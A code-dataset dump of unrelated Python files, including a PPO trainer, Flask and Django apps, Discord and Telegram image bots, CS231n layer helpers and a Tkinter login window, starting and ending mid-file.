range(args.K):\n for data_l in dataloader:\n # mb means minibatch \n mb_size = data_l[0].shape[0]\n mb_state = data_l[0].to(device)\n mb_action = data_l[1].to(device)\n mb_prob = data_l[2].to(device)\n mb_advan = data_l[3].to(device)\n mb_critic_target = data_l[4].to(device)\n\n with autograd.detect_anomaly():\n \n mb_new_prob = actor.return_prob(mb_state).to(device)\n mb_old_prob = mb_prob.reshape(mb_size, 1).mm(torch.ones(1, action_n).to(device))\n # CLIP Loss\n prob_div = mb_new_prob / mb_old_prob\n mb_advan_square = mb_advan.reshape(mb_size, 1).mm(torch.ones(1, action_n).to(device))\n CLIP_1 = prob_div * mb_advan_square\n CLIP_2 = prob_div.clamp(1-args.epsilon, 1+args.epsilon) * mb_advan_square\n # - is for nll_loss\n loss_clip = - F.nll_loss(torch.Tensor.min(CLIP_1, CLIP_2), mb_action)\n # entropy loss: -p*ln(p)\n # +EPS for the existence of Nan in actor model in backpropagation\n loss_entropy = - (torch.Tensor.log2(mb_new_prob+EPS) * mb_new_prob).sum() / mb_size\n actor_loss = -(loss_clip+args.c2*loss_entropy)\n \n actor_optm.zero_grad()\n actor_loss.backward()\n actor_optm.step()\n\n # VF loss\n mb_value_predict = critic(mb_state).flatten()\n loss_value = torch.Tensor.mean((mb_critic_target-mb_value_predict).pow(2))\n critic_loss = loss_value\n with autograd.detect_anomaly():\n critic_optm.zero_grad()\n critic_loss.backward()\n critic_optm.step()\n \n #print(loss_clip)\n #print(loss_value)\n #print(loss_entropy)\n\n frame_count += batch_size * args.FrameSkip\n args.update(frame_count)\n # update optim's learning rate\n for gg in actor_optm.param_groups:\n gg['lr'] = args.stepsize\n for gg in critic_optm.param_groups:\n gg['lr'] = args.stepsize\n if g % 10 == 0:\n print(\"Gen %s | progross percent:%.2f | time %.2f\" % (g, frame_count/args.Tmax*100, time.time()-start_time))\n print(\"Gen %s | progross %s/%s | time %.2f\" % (g, frame_count, args.Tmax, time.time()-start_time))\n\n if frame_count > args.Tmax:\n break\n\n if g % 10 == 0:\n records_id = [s.get_records.remote() for s in simulators]\n save_record(records_id, storage_path, 'ppo-record-%s.csv' % gamename)\n torch.save(actor.state_dict(), storage_path+\"ppo_actor_\"+gamename+'.pt')\n\n # after training\n records_id = [s.get_records.remote() for s in simulators]\n save_record(records_id, storage_path, 'ppo-record-%s.csv' % gamename)\n torch.save(actor.state_dict(), storage_path+\"ppo_actor_\"+gamename+'.pt')\n\n\nif __name__ == \"__main__\":\n ray.init()\n main()\n\n\n","sub_path":"code/ppo2_mujoco.py","file_name":"ppo2_mujoco.py","file_ext":"py","file_size_in_byte":11410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"162142331","text":"#!/usr/bin/env python3\n\nimport nono\nimport nonogen\nimport random\n\nif __name__ == \"__main__\":\n grid = nono.NonoGrid(random.choice(range(5, 20)), random.choice(range(5,20)))\n\n nonogen.gen_perlin(grid)\n\n grid.gen_hints()\n\n print(f\"{grid.type} \\n{grid}\")\n\n grid.to_picture(\"nonogrid.jpg\")\n grid.to_picture(\"nonogrid_solved.jpg\", has_value_color=\"orange\")\n","sub_path":"nonogen/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"28573381","text":"import ctypes\r\n\r\nimport sdl2\r\n\r\nfrom Model.Agent import Agent as ModelAgent\r\nfrom Model.Target import Target as Target\r\nfrom Vector2 import Vector2 as Vector2\r\n\r\n\r\nclass Agent:\r\n def __init__(self, agents, targets):\r\n self.agents = agents\r\n self.targets = targets\r\n self.speed = 1\r\n\r\n def handle_event(self, event):\r\n if event.type == sdl2.SDL_KEYDOWN:\r\n if event.key.keysym.sym == sdl2.SDLK_1:\r\n self.speed = 1\r\n if event.type == sdl2.SDL_KEYDOWN:\r\n if event.key.keysym.sym == sdl2.SDLK_2:\r\n self.speed = 2\r\n if event.type == sdl2.SDL_KEYDOWN:\r\n if event.key.keysym.sym == sdl2.SDLK_3:\r\n self.speed = 3\r\n if event.type == sdl2.SDL_KEYDOWN:\r\n if event.key.keysym.sym == sdl2.SDLK_4:\r\n self.speed = 4\r\n if event.type == sdl2.SDL_KEYDOWN:\r\n if event.key.keysym.sym == sdl2.SDLK_5:\r\n self.speed = 5\r\n\r\n if event.type == sdl2.SDL_MOUSEBUTTONDOWN:\r\n point = Vector2(ctypes.c_int(0), ctypes.c_int(0))\r\n sdl2.mouse.SDL_GetMouseState(ctypes.byref(point.x), ctypes.byref(point.y))\r\n point = Vector2(point.x.value, point.y.value)\r\n\r\n if event.button.button == sdl2.SDL_BUTTON_LEFT:\r\n self.agents.append(ModelAgent(Vector2(point.x, point.y), self.speed))\r\n\r\n if event.button.button == sdl2.SDL_BUTTON_RIGHT:\r\n self.targets.append(Target(Vector2(point.x, point.y)))\r\n\r\n def reset(self):\r\n del self.agents[:]\r\n del self.targets[:]\r\n self.speed = 1\r\n","sub_path":"PLDijkstraPathfindingVisualization/Pathfinding/Controller/Agent.py","file_name":"Agent.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"343094610","text":"import os\nos.environ['DJANGO_SETTINGS_MODULE'] = 'MedQuipSite.settings'\n\nfrom Products.models import Product, Category, Attribute\nimport json\n\nif __name__ == '__main__':\n for product in Product.objects.all():\n try:\n attributes = Attribute.objects.filter(product=product).all()\n \n if(len(attributes) == 1):\n product.attribute_type = 0\n attribute = attributes[0]\n product.price = attribute.price\n product.description = attribute.description\n product.short_description = attribute.short_description\n product.sku = attribute.sku\n product.save()\n attribute.delete()\n \n except:\n #no attributes\n product.attribute_type = 0\n product.save()\n ","sub_path":"MedQuipSite/extra scripts/fix_products_with_one_attribute.py","file_name":"fix_products_with_one_attribute.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"59488032","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /thrift/TMultiplexedProcessor.py\n# Compiled at: 2018-09-11 21:54:05\n# Size of source mod 2**32: 2233 bytes\nfrom thrift.Thrift import TProcessor, TMessageType, TException\nfrom thrift.protocol import TProtocolDecorator, TMultiplexedProtocol\n\nclass TMultiplexedProcessor(TProcessor):\n\n def __init__(self):\n self.services = {}\n\n def registerProcessor(self, serviceName, processor):\n self.services[serviceName] = processor\n\n def process(self, iprot, oprot):\n name, type, seqid = iprot.readMessageBegin()\n if type != TMessageType.CALL:\n if type != TMessageType.ONEWAY:\n raise TException('TMultiplexed protocol only supports CALL & ONEWAY')\n index = name.find(TMultiplexedProtocol.SEPARATOR)\n if index < 0:\n raise TException('Service name not found in message name: ' + name + '. Did you forget to use TMultiplexedProtocol in your client?')\n serviceName = name[0:index]\n call = name[index + len(TMultiplexedProtocol.SEPARATOR):]\n if serviceName not in self.services:\n raise TException('Service name not found: ' + serviceName + '. Did you forget to call registerProcessor()?')\n standardMessage = (call, type, seqid)\n return self.services[serviceName].process(StoredMessageProtocol(iprot, standardMessage), oprot)\n\n\nclass StoredMessageProtocol(TProtocolDecorator.TProtocolDecorator):\n\n def __init__(self, protocol, messageBegin):\n self.messageBegin = messageBegin\n\n def readMessageBegin(self):\n return self.messageBegin","sub_path":"pycfiles/thrift_adv-1.0.0.dev0-cp36-cp36m-macosx_10_13_x86_64/TMultiplexedProcessor.cpython-36.opt-1.py","file_name":"TMultiplexedProcessor.cpython-36.opt-1.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"118886544","text":"import gntp.notifier\n\ngrowl = gntp.notifier.GrowlNotifier(\n applicationName=\"Notif 0.1a\",\n notifications=[\"New updates\", \"New Messages\"])\n\ngrowl.register()\n\ngrowl.notify(\n noteType=\"New Messages\",\n title=\"Remember to drink Water!\",\n description=\"One cup at a time, towards the good health!\")\n\n","sub_path":"notif/notif.py","file_name":"notif.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"53005434","text":"def highest_even(li):\n evens = []\n for item in li:\n if item % 2 == 0:\n evens.append(item)\n return max(evens)\n\ndef highest_odd(li):\n odds = []\n for item in li:\n if item % 2 == 1:\n odds.append(item)\n return max(odds)\n\nprint(highest_odd([1,2,3,4,5,6,7,8,9,25,33]))\n\nprint(highest_even([1,2,3,4,5,6,7,8,9,25,33]))\n\n\n\n\n","sub_path":"Excercises/highest_even_odd.py","file_name":"highest_even_odd.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"593700055","text":"from django.contrib.auth.models import User, Group\nfrom rest_framework import viewsets\nfrom rest_framework.views import APIView\nfrom facerecognition.serializers import UserSerializer, GroupSerializer, PostSerializer, FotoSerializer\nfrom rest_framework.permissions import IsAuthenticated, IsAdminUser\nfrom facerecognition.models import Post, Foto\nfrom rest_framework.parsers import MultiPartParser, FormParser\n\nclass UserViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows users to be viewed or edited.\n \"\"\"\n queryset = User.objects.all().order_by('-date_joined')\n serializer_class = UserSerializer\n permission_classes = (IsAuthenticated,)\n \nclass GroupViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = Group.objects.all()\n serializer_class = GroupSerializer\n\nclass PostViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows users to be viewed or edited.\n \"\"\"\n queryset = Post.objects.all()\n serializer_class = PostSerializer\n permission_classes = (IsAdminUser,)\n\nclass FotosViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = Foto.objects.all()\n serializer_class = FotoSerializer\n parser_classes = (FormParser, MultiPartParser)\n\n def post(self, request):\n file_obj = request.FILES\n print(file_obj)","sub_path":"facerecognition/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"65940526","text":"from flask import Flask, render_template, request, redirect, url_for\nfrom flask_sqlalchemy import SQLAlchemy\nimport os\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///example.sqlite'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\n# Role class\nclass Events(db.Model):\n\t__tablename__ = \"Events\"\n\tid = db.Column(db.Integer(), primary_key=True)\n\tcampus = db.Column(db.String())\n\tlocation = db.Column(db.String())\n\ttitle = db.Column(db.String())\n\tstart = db.Column(db.String())\n\tend = db.Column(db.String())\n\tdescription = db.Column(db.String())\n\ttags = db.relationship(\"Tags\", cascade=\"all, delete, delete-orphan\")\n\t\nclass Tags(db.Model):\n\tid = db.Column(db.Integer(), primary_key=True)\n\tresultid = db.Column(db.Integer, db.ForeignKey('Events.id'))\n\ttag = db.Column(db.String(255))\ndb.create_all()\n@app.route('/post', methods=['POST'])\ndef post():\n\tcampus=request.form['dropdown']\n\tlocation=request.form['location']\n\ttitle = request.form['title']\n\tstart=request.form['start']\n\tend=request.form['end']\n\tdescription=request.form['description']\n\ttags = request.form.getlist('tags')\n\tevent = Events (campus = campus, location = location, title = title, start = start, end = end, description = description)\n\t\n\tif len(tags) == 0:\n\t\tevent.tags.append(Tags(tag = \"Other\"))\n\tfor tag in tags:\n\t\tevent.tags.append(Tags(tag = tag))\n\tdb.session.add(event)\n\tdb.session.commit()\n\treturn render_template('index.html', events = Events.query.all())\n\t\n@app.route('/api/visitors')\ndef thisstopsitfromcrashingforsomereason():\n content = request.json\n\n@app.route('/addForm')\ndef addForm():\n\treturn render_template('addForm.html')\n\t\n@app.route('/category')\ndef category():\n\treturn render_template('category.html')\n\t\n@app.route('/cal')\ndef cal():\n\treturn render_template('cal.html')\n\n@app.route('/test')\ndef test():\n\treturn render_template('test.html', events = Events.query.all())\n\t\n@app.route('/home')\ndef home():\n\treturn render_template('index.html', events = Events.query.all())\n\t\n@app.route('/')\ndef index():\n\treturn render_template('index.html', events = Events.query.all())\n\t\nport = int(os.getenv('PORT', 8080))\nif __name__ == '__main__':\n\tapp.run(host='localhost', port=port, debug=True)","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"253079307","text":"#-*- coding: UTF-8 -*-\r\n\r\n\r\nimport io\r\nimport pycurl\r\nimport logging\r\nfrom logging.handlers import RotatingFileHandler\r\n\r\n\r\nclass MyFilter1(logging.Filter):\r\n def __init__(self, levelname):\r\n self.levelno = {\r\n 'NOTSE': 0,\r\n 'DEBUG': 10,\r\n 'INFO': 20,\r\n 'WARNING': 30,\r\n 'ERROR': 40,\r\n 'CRITICAL': 50,\r\n }[levelname]\r\n\r\n def filter(self, record):\r\n if record.levelno < self.levelno and not record.exc_info:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\nclass MyFilter2(logging.Filter):\r\n def filter(self, record):\r\n #if record.levelname == 'ERROR' only record exception\r\n if record.exc_info or record.levelname == 'CRITICAL':\r\n return True\r\n else:\r\n return False\r\n\r\n\r\nformat = logging.Formatter(\"%(levelname)s-%(asctime)s-%(module)s: %(message)s\")\r\n\r\n\r\nnormal_hand = RotatingFileHandler('log/normal.log', maxBytes=2 * 1024 * 1024, backupCount=5)\r\nnormal_hand.setLevel(logging.DEBUG)\r\nmy_filter = MyFilter1('CRITICAL')\r\nnormal_hand.addFilter(my_filter)\r\nnormal_hand.setFormatter(format)\r\n\r\n\r\ncrit_hand = logging.FileHandler('log/crit.log')\r\ncrit_hand.setLevel(logging.ERROR)\r\nmy_filter2 = MyFilter2()\r\ncrit_hand.addFilter(my_filter2)\r\ncrit_hand.setFormatter(format)\r\n\r\n\r\ntask_log = logging.getLogger('task')\r\ntask_log.setLevel(logging.DEBUG)\r\ntask_log.addHandler(normal_hand)\r\ntask_log.addHandler(crit_hand)","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"146254209","text":"import discord\nimport reply\n\nbot_token = \"\" # Discord Bot Token\n\n# Discord\nclient = discord.Client()\n\n@client.event\nasync def on_ready():\n\tprint(\"Logged in as\", client.user.name, client.user.id)\n\n@client.event\nasync def on_message(message):\n\tif ((message.type == discord.MessageType.default) and (client.user != message.author)):\n\t\ttext = message.content\n\t\tprint(message.author.name)\n\t\tres = reply.make_reply(text)\n\t\tchannel = message.channel\n\t\tasync with channel.typing():\n\t\t\tawait channel.send(res)\n\nclient.run(bot_token)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"492270908","text":"import cv2\nfrom PIL import Image\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\nimport os\nimport pickle\nfrom math import *\nimport scipy.misc\nbase = 16\nbias_base = 10\nbias = [log(bias_base+i,3) for i in range(1,540000,18000)]\nexposure_range = 11\n\nset_dir = [\"photo/\" + folders for folders in os.listdir(\"photo\") if os.path.isdir(\"photo/\"+folders) == True]\nk = 2\ndef main():\n for index in range(1,2): #loop for k\n compsum_B = np.zeros((256,256),dtype=\"float64\")\n compsum_G = np.zeros((256,256),dtype=\"float64\")\n compsum_R = np.zeros((256,256),dtype=\"float64\")\n for j in range(len(bias)): #loop for bias\n exposures = [(base+bias[j])*k**i for i in range(exposure_range)]\n \n ki = 2**index\n file_list_g = ['out_{}_{}_G.txt'.format(exposures[i],exposures[i+index]) for i in range(len(exposures)-index)]\n file_list_b = ['out_{}_{}_B.txt'.format(exposures[i],exposures[i+index]) for i in range(len(exposures)-index)]\n file_list_r = ['out_{}_{}_R.txt'.format(exposures[i],exposures[i+index]) for i in range(len(exposures)-index)]\n #temp = [\"tmp/\"]\n #set_dir = temp\n\n count = 1\n for i in set_dir:\n print(\"current folder:{}/{},index: {}/{}, bias: {}/{}\".format(count,len(set_dir),index,3,j+1,len(bias)))\n for fname_b in file_list_b:\n compsum_B += np.loadtxt(os.path.join(i,fname_b))\n for fname_g in file_list_g:\n compsum_G += np.loadtxt(os.path.join(i,fname_g))\n for fname_r in file_list_r:\n compsum_R += np.loadtxt(os.path.join(i,fname_r))\n count+=1\n np.savetxt(\"compsum_B_raw_{}.txt\".format(k**index),compsum_B,fmt=\"%d\")\n np.savetxt(\"compsum_G_raw_{}.txt\".format(k**index),compsum_G,fmt=\"%d\")\n np.savetxt(\"compsum_R_raw_{}.txt\".format(k**index),compsum_R,fmt=\"%d\")\n\n compsum_B[compsum_B>255] = 255\n compsum_G[compsum_G>255] = 255\n compsum_R[compsum_R>255] = 255\n\n scipy.misc.imsave('compsum_B_{}.jpg'.format(k**index),compsum_B)\n scipy.misc.imsave('compsum_G_{}.jpg'.format(k**index),compsum_G)\n scipy.misc.imsave('compsum_R_{}.jpg'.format(k**index),compsum_R)\n\n #sum_B = Image.fromarray(np.uint8(compsum_B,mode='L'))\n #sum_G = Image.fromarray(np.uint8(compsum_G,mode='L'))\n #sum_R = Image.fromarray(np.uint8(compsum_R,mode='L'))\n\n #sum_B.save('compsum_B_{}.jpg'.format(k**index))\n #sum_G.save('compsum_G_{}.jpg'.format(k**index))\n #sum_R.save('compsum_R_{}.jpg'.format(k**index))\n\nif __name__ == \"__main__\":\n main()","sub_path":"ccrf_rework/comparasum.py","file_name":"comparasum.py","file_ext":"py","file_size_in_byte":2788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"59535740","text":"from flask import Flask, jsonify, request\n\napp = Flask(__name__)\n\n\n@app.route(\"/turnover/byAgeAndGender\", methods=['GET'])\ndef getTurnoverByAgeAndGender():\n \"\"\"\n Accumulated widget: Total turnover & turnovers by age and gender\n Map: Postal code selection\n\n Keyword arguments:\n startMonth - Filtered by Month when starts the period\n endMonth - Filtered by Month when finishes the period\n postalCode - Filtered by postal code selected\n ordered - Results ordered by turnover [ASC, DESC]\n Return: Total turnover & turnover by age and gender between period\n \"\"\"\n return {\n \"total\": 0,\n \"ages\": {\n \"<=24\": {\n \"M\": 0,\n \"F\": 0\n },\n \"25-34\": {\n \"M\": 0,\n \"F\": 0\n },\n \"35-44\": {\n \"M\": 0,\n \"F\": 0\n },\n \"45-54\": {\n \"M\": 0,\n \"F\": 0\n },\n \"55-64\": {\n \"M\": 0,\n \"F\": 0\n },\n \">=65\": {\n \"M\": 0,\n \"F\": 0\n }\n }\n }\n\n\n@app.route(\"/turnover/monthlyBy//\", methods=['GET'])\ndef getMonthlyTurnoverByAgeOrGender(field):\n \"\"\"\n Time series widget: Monthly turnover by Age or Gender\n\n Keyword arguments:\n field - Attribute which filter the result [age, gender]\n startMonth - Month when starts the period\n endMonth - Month when finishes the period\n\n Return: Turnover by age or gender grouped by months between period\n \"\"\"\n byGender = {\n \"2015-01\": {\n \"M\": 0,\n \"F\": 0\n },\n \"2015-02\": {\n \"M\": 0,\n \"F\": 0\n },\n \"2015-03\": {\n \"M\": 0,\n \"F\": 0\n },\n \"2015-04\": {\n \"M\": 0,\n \"F\": 0\n }\n }\n byAge = {\n \"2015-12\": {\n \"<=24\": 0,\n \"25-34\": 0,\n \"35-44\": 0,\n \"45-54\": 0,\n \"55-64\": 0,\n \">=65\": 0\n },\n \"2016-01\": {\n \"<=24\": 0,\n \"25-34\": 0,\n \"35-44\": 0,\n \"45-54\": 0,\n \"55-64\": 0,\n \">=65\": 0\n },\n \"2016-02\": {\n \"<=24\": 0,\n \"25-34\": 0,\n \"35-44\": 0,\n \"45-54\": 0,\n \"55-64\": 0,\n \">=65\": 0\n },\n \"2016-03\": {\n \"<=24\": 0,\n \"25-34\": 0,\n \"35-44\": 0,\n \"45-54\": 0,\n \"55-64\": 0,\n \">=65\": 0\n }\n }\n return byGender if field == 'gender' else byAge\n\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=4000, debug=True)\n","sub_path":"src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"219521472","text":"from cs231n.layers import *\nfrom cs231n.fast_layers import *\n\n\ndef affineReluForward(x, w, b):\n \"\"\"\n Convenience layer that perorms an affine transform followed by a ReLU\n\n Inputs:\n - x: Input to the affine layer\n - w, b: Weights for the affine layer\n\n Returns a tuple of:\n - out: Output from the ReLU\n - cache: Object to give to the backward pass\n \"\"\"\n a, fcCache = affineForward(x, w, b)\n out, reluCache = reluForward(a)\n cache = (fcCache, reluCache)\n return out, cache\n\n\ndef affineReluBackward(dout, cache):\n \"\"\"\n Backward pass for the affine-relu convenience layer\n \"\"\"\n fcCache, reluCache = cache\n da = reluBackward(dout, reluCache)\n dx, dw, db = affineBackward(da, fcCache)\n return dx, dw, db\n\n\ndef conv_relu_forward(x, w, b, conv_param):\n \"\"\"\n A convenience layer that performs a convolution followed by a ReLU.\n\n Inputs:\n - x: Input to the convolutional layer\n - w, b, conv_param: Weights and parameters for the convolutional layer\n \n Returns a tuple of:\n - out: Output from the ReLU\n - cache: Object to give to the backward pass\n \"\"\"\n a, conv_cache = conv_forward_fast(x, w, b, conv_param)\n out, relu_cache = relu_forward(a)\n cache = (conv_cache, relu_cache)\n return out, cache\n\n\ndef conv_relu_backward(dout, cache):\n \"\"\"\n Backward pass for the conv-relu convenience layer.\n \"\"\"\n conv_cache, relu_cache = cache\n da = relu_backward(dout, relu_cache)\n dx, dw, db = conv_backward_fast(da, conv_cache)\n return dx, dw, db\n\n\ndef conv_relu_pool_forward(x, w, b, conv_param, pool_param):\n \"\"\"\n Convenience layer that performs a convolution, a ReLU, and a pool.\n\n Inputs:\n - x: Input to the convolutional layer\n - w, b, conv_param: Weights and parameters for the convolutional layer\n - pool_param: Parameters for the pooling layer\n\n Returns a tuple of:\n - out: Output from the pooling layer\n - cache: Object to give to the backward pass\n \"\"\"\n a, conv_cache = conv_forward_fast(x, w, b, conv_param)\n s, relu_cache = relu_forward(a)\n out, pool_cache = max_pool_forward_fast(s, pool_param)\n cache = (conv_cache, relu_cache, pool_cache)\n return out, cache\n\n\ndef conv_relu_pool_backward(dout, cache):\n \"\"\"\n Backward pass for the conv-relu-pool convenience layer\n \"\"\"\n conv_cache, relu_cache, pool_cache = cache\n ds = max_pool_backward_fast(dout, pool_cache)\n da = relu_backward(ds, relu_cache)\n dx, dw, db = conv_backward_fast(da, conv_cache)\n return dx, dw, db\n\n","sub_path":"2016/Assignment2/cs231n/layer_utils.py","file_name":"layer_utils.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"195435062","text":"file = open('node.txt', 'r')\n\nadj = {}\ntop_ten = []\nat_least_3 = 0\n\nfor line in file:\n # Separate the names of the nodes\n data = line.split()\n # Add to the adjacency list\n adj[data[0]] = data[1:]\n if len(data) >= 4:\n # If the node has at least 3 links/edges\n at_least_3 += 1\n\n # Find node with least links in top_ten, replace it\n # with new node if the new node has more links\nfile.close()\nprint(adj)\n\n# Do required stuff with adjacency list here","sub_path":"Stat.py","file_name":"Stat.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"21752292","text":"import binascii\n\n# Some practice and reference for dealing with the conversions in the future\n#\n\n\ninpt = \"1b37373331363f78151b7f2b783431333d78397828372d363c78373e783a393b3736\"; # string representation of a hex\n## represents a single int value of the entire hex string\nd = int(inpt,16);\nprint(d);\n\n## hex string to an int then an int to binary\nb = bin (int(inpt,16));\nb = b[2:] # get rid of the 0b representation\nb = b.zfill(4*len(inpt)); # fills in the zeroes from the hex\nprint (b);\n\n# from the binary string to a hex string again\nd2 = hex(d);\nd2 = d2[2:];\nd2 = d2.zfill(len(inpt));\nprint(d2);\n\n","sub_path":"old/testconversions.py","file_name":"testconversions.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"253717734","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom modules.utils import caption_filter, get_image, send_image\nfrom telegram.ext import CommandHandler, MessageHandler\nfrom telegram import ChatAction\nimport subprocess\nimport datetime\nimport yaml\n\n\ndef handler(dp):\n dp.add_handler(MessageHandler(caption_filter(\"/kek\"), kek))\n dp.add_handler(CommandHandler(\"kek\", kek))\n\n# import path\nwith open(\"config.yml\", \"r\") as f:\n path = yaml.load(f)[\"path\"][\"kek\"]\n\nextensions = (\".jpg\", \".jpeg\", \".png\", \".bmp\", \".webp\")\n\n\n# get image, pass parameter\ndef kek(bot, update):\n if update.message.reply_to_message is not None:\n kek_param = \"\".join(update.message.text[5:7])\n else:\n kek_param = \"\".join(update.message.caption[5:7])\n try:\n extension = get_image(bot, update, path)\n except:\n update.message.reply_text(\"Can't get the image! :(\")\n return\n if extension not in extensions:\n update.message.reply_text(\"Unsupported file, onii-chan!\")\n return False\n update.message.chat.send_action(ChatAction.UPLOAD_PHOTO)\n result = kekify(update, kek_param, extension)\n send_image(update, path, result, extension)\n print(datetime.datetime.now(), \">>>\", \"Done kek\", \">>>\", update.message.from_user.username)\n\n\n# kek process + send\ndef kekify(update, kek_param, extension):\n try:\n if kek_param == \"-l\" or kek_param == \"\":\n crop = \"50%x100% \"\n piece_one = \"result-0\" + extension\n piece_two = \"result-1\" + extension\n flip = \"-flop \"\n order = path + piece_one + \" \" + path + piece_two\n append = \"+append \"\n result = \"kek-left\"\n elif kek_param == \"-r\":\n crop = \"50%x100% \"\n piece_one = \"result-1\" + extension\n piece_two = \"result-0\" + extension\n flip = \"-flop \"\n order = path + piece_two + \" \" + path + piece_one\n append = \"+append \"\n result = \"kek-right\"\n elif kek_param == \"-t\":\n crop = \"100%x50% \"\n piece_one = \"result-0\" + extension\n piece_two = \"result-1\" + extension\n flip = \"-flip \"\n order = path + piece_one + \" \" + path + piece_two\n append = \"-append \"\n result = \"kek-top\"\n elif kek_param == \"-b\":\n crop = \"100%x50% \"\n piece_one = \"result-1\" + extension\n piece_two = \"result-0\" + extension\n flip = \"-flip \"\n order = path + piece_two + \" \" + path + piece_one\n append = \"-append \"\n result = \"kek-bot\"\n elif kek_param == \"-m\":\n result = multikek(update, extension)\n return result\n elif kek_param == \"-v\":\n update.message.reply_text(\"What are you a fucking faggot?\")\n return\n cut = \"convert \" + path + \"original\" + extension + \" -crop \" + crop + path + \"result\" + extension\n subprocess.run(cut, shell=True)\n mirror = \"convert \" + path + piece_one + \" \" + flip + \" \" + path + piece_two\n subprocess.run(mirror, shell=True)\n append = \"convert \" + order + \" \" + append + path + result + extension\n subprocess.run(append, shell=True)\n return result\n except:\n update.message.reply_text(\"Unknown kek parameter.\\nUse -l, -r, -t, -b or -m\")\n return\n\n\ndef multikek(update, extension):\n kekify(update, \"-l\", extension)\n kekify(update, \"-r\", extension)\n kekify(update, \"-t\", extension)\n kekify(update, \"-b\", extension)\n append_lr = \"convert \" + path + \"kek-left\" + extension + \" \" + path + \"kek-right\" + extension + \" +append \" + path + \"kek-lr-temp\" + extension\n subprocess.run(append_lr, shell=True)\n append_tb = \"convert \" + path + \"kek-top\" + extension + \" \" + path + \"kek-bot\" + extension + \" +append \" + path + \"kek-tb-temp\" + extension\n subprocess.run(append_tb, shell=True)\n append_all = \"convert \" + path + \"kek-lr-temp\" + extension + \" \" + path + \"kek-tb-temp\" + extension + \" -append \" + path + \"multikek\" + extension\n subprocess.run(append_all, shell=True)\n result = \"multikek\"\n return result","sub_path":"modules/kek.py","file_name":"kek.py","file_ext":"py","file_size_in_byte":4148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"575270294","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 26 19:16:32 2020\r\n\r\n@author: morte\r\n\"\"\"\r\n\r\nfrom tkinter import *\r\nfrom tkinter import ttk, font\r\n\r\n\r\n# Gestor de geometría (grid). Ventana no dimensionable\r\n\r\nclass Aplicacion():\r\n __ventana=None\r\n __usuario=None\r\n __clave=None\r\n def __init__(self):\r\n self.__ventana = Tk()\r\n self.__ventana.title(\"Acceso\")\r\n \r\n # Establece que no se pueda modificar el tamaño de la\r\n # ventana. El método resizable(0,0) es la forma abreviada \r\n # de resizable(width=False,height=False).\r\n \r\n self.__ventana.resizable(0,0)\r\n fuente = font.Font(weight='bold')\r\n \r\n # Define un widget de tipo 'Frame' (marco) que será el\r\n # contenedor del resto de widgets. El marco se situará \r\n # en la ventana 'self.raiz' ocupando toda su extensión.\r\n # El marco se define con un borde de 2 píxeles y la\r\n # opción 'relief' con el valor 'raised' (elevado) añade\r\n # un efecto 3D a su borde. \r\n # La opción 'relief' permite los siguientes valores:\r\n # FLAT (llano), RAISED (elevado), SUNKEN (hundido),\r\n # GROOVE (hendidura) y RIDGE (borde elevado).\r\n # La opción 'padding' añade espacio extra interior para\r\n # que los widgets no queden pegados al borde del marco.\r\n \r\n self.marco = 